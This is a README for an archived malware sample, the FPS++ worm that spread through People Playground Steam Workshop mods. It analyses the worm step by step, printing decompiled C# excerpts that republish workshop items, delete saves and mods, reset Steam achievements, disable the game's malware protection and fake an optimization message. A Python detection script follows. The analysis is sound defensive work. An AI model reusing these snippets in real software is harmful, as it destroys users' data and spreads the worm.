sheepism/FPSPlusPlus-malware

FPSPlusPlus-malware

Decompiled malware samples from the People Playground workshop malware FPS++.

This is a malware sample from the PPG malware attack. It is for educational and archival purposes only. Executing this code may have negative consequences.

If you are infected, there is no way to restore your files. Don't play with malware, kids.

As the malware has been blocked from executing in the latest People Playground versions, it should be mostly safe. However, misusing any malware samples is not a good idea.

The compiled .dll FPSPlusPlus.dll should not be executed under any circumstances and is included only for accuracy. Source code is available one directory up.

Full credit to maksim10411072 for his source code and DLL decompiling of the malware.

Additional credit to Wevls for their contributions to the early analysis.

Full Analysis

The malicious script worked as a self-propagating worm, infecting Steam Workshop mods for People Playground. This is what FPSPlusPlus.entry.cs (originally compiled as FPSPlusPlus.dll) actually does:

  1. The script first identifies, modifies, and republishes all player-published Steam Workshop items, changing their metadata to point to FPS++'s own files.

    await shit.Edit()
        .WithContent(m.MetaLocation)          // ← changing the metadata to FPS++'s own MetaLocation
        .WithTag("Mods")
        .WithDescription((Random.Range(0, 2) == 1)
            ? shit.Description                // keeps original description
            : shit.Description + "\noptimized!")  // or adds "optimized!"
        .SubmitAsync();

This way, every time an infected mod is downloaded and executed, it will work as a copy of the worm.

  2. The worm then proceeds to upvote and favorite both the original mod (now malicious) and any other content it may have infected. This helps increase its visibility and reach.

    await shit.Value.Vote(up: true); // liking content on Steam
    await shit.Value.AddFavorite(); // adding it to favorites

It also creates a new public workshop item with the malicious code.

    await Editor.NewCommunityFile.WithPublicVisibility()
        .WithContent(m.MetaLocation) // ← again, changing the metadata to FPS++'s own MetaLocation
        .SubmitAsync();

  3. The next step is the disabling of all competing mods except itself, or any mods created by "Microsoft Word", making sure it remains as the only active mod.

    Directory.Delete("Maps", recursive: true);
    Directory.Delete("Contraptions", recursive: true);
    File.Delete("config.json");

  4. After infecting everything and disabling all mods, the worst part starts: it deletes all game saves, configurations, player-created maps, preferred settings, mods, and even saved contraptions.

    File.Delete("config.json"); // ← deleting config files
    File.Delete("ControlScheme.json");

    Directory.Delete("CompiledModAssemblies", recursive: true); // ← deleting mods

    File.Delete("People Playground_Data/tc.bin"); // ← deleting other game data
    Directory.Delete("Maps", recursive: true); // ← deleting maps
    Directory.Delete("Contraptions", recursive: true); // ← deleting contraptions

Then it wipes all player Steam achievements and deletes all statistics.

    SteamUserStats.ResetAll(includeAchievements: true); // ← revoking Steam achievements
    File.Delete("stats"); // ← deleting stats

  5. The script itself also turns off RejectShadyCode (PPG's malware protection option), allowing more copies of the same code to run without being flagged as malicious for containing assemblies.

    UserPreferenceManager.Current.RejectShadyCode = false;

While the worm infects and destroys the files, everything looks normal in-game. The script is programmed to display your current FPS multiplied by 3, to make it look like it's optimizing the game.

    UserPreferenceManager.Current = new Preferences
    {
        ShowFramerate = true,      // forces FPS display to be on
        FramerateLimit = 10000     // sets super high FPS limit
    };
    UserPreferenceManager.Save();

    try
    {
        int num = int.Parse(ihatethis.Text.text.Substring(0, ihatethis.Text.text.Length - 4)) * 3; // ← faking high FPS (displaying triple your current real FPS)
        ihatethis.Text.text = num + " fps";
    }
    catch
    {
        ihatethis.Text.text = "958"; // ← if it fails, it just fixes the FPS display to 958
    }

    DialogBox dialogBox = DialogBoxManager.Dialog("Optimization of the game..."); // ← showing fake optimization message

    // all the destruction code is executed

    dialogBox.Close();
    DialogBoxManager.Notification("Optimization of the game completed!"); // ← showing fake "game optimized" message

All of these steps happen within a couple of seconds, so players have absolutely no chance of disabling it. Once you notice the FPS++ files in your mods folder, the damage is already long done.
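
For triaging other workshop mods, the behaviours listed in the analysis can be turned into a static check over a mod's C# source. The following Python script is an added example, not code from this repository or from People Playground; the regexes, category names, verdict thresholds and both sample inputs are assumptions constructed for illustration.

```python
import re

# Patterns for behaviours the analysis attributes to FPS++ (example's own regexes).
INDICATORS = {
    "protection_tamper": [r'RejectShadyCode\s*=\s*false'],
    "workshop_republish": [r'\.WithContent\s*\(', r'NewCommunityFile'],
    "self_promotion": [r'\.Vote\s*\(\s*up\s*:\s*true', r'\.AddFavorite\s*\('],
    "stats_wipe": [r'SteamUserStats\.ResetAll\s*\('],
    "game_data_wipe": [
        r'Directory\.Delete\s*\(\s*"(Maps|Contraptions|CompiledModAssemblies)"',
        r'File\.Delete\s*\(\s*"(config\.json|ControlScheme\.json|stats|'
        r'People Playground_Data/tc\.bin)"',
    ],
}

def scan_source(text):
    """Return {category: [line numbers]} for indicator hits in C# source text."""
    hits = {}
    for lineno, line in enumerate(text.splitlines(), start=1):
        code = line.split("//", 1)[0]  # drop trailing comments before matching
        for category, patterns in INDICATORS.items():
            if any(re.search(p, code) for p in patterns):
                hits.setdefault(category, []).append(lineno)
    return hits

def verdict(hits):
    """Block on protection tampering or 2+ behaviour categories; review on one."""
    if "protection_tamper" in hits or len(hits) >= 2:
        return "block"
    return "review" if hits else "clean"

# Constructed sample assembled from the excerpts quoted above (inert text only).
SUSPECT_SAMPLE = '''\
UserPreferenceManager.Current.RejectShadyCode = false;
await item.Edit().WithContent(m.MetaLocation).SubmitAsync();
await item.Vote(up: true);
Directory.Delete("Maps", recursive: true);
SteamUserStats.ResetAll(includeAchievements: true);
'''

# Constructed benign snippet: the flag appears only in a comment, the delete is unrelated.
BENIGN_SAMPLE = '''\
// RejectShadyCode = false would be flagged if it were code
File.Delete("mymod_cache.tmp");
Debug.Log("mod loaded");
'''
if __name__ == "__main__":
    for src in (SUSPECT_SAMPLE, BENIGN_SAMPLE):
        print(verdict(scan_source(src)), scan_source(src))
```

A single category only yields "review" because a legitimate mod could plausibly touch one of these APIs; the combination of categories is what matches the worm described here.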
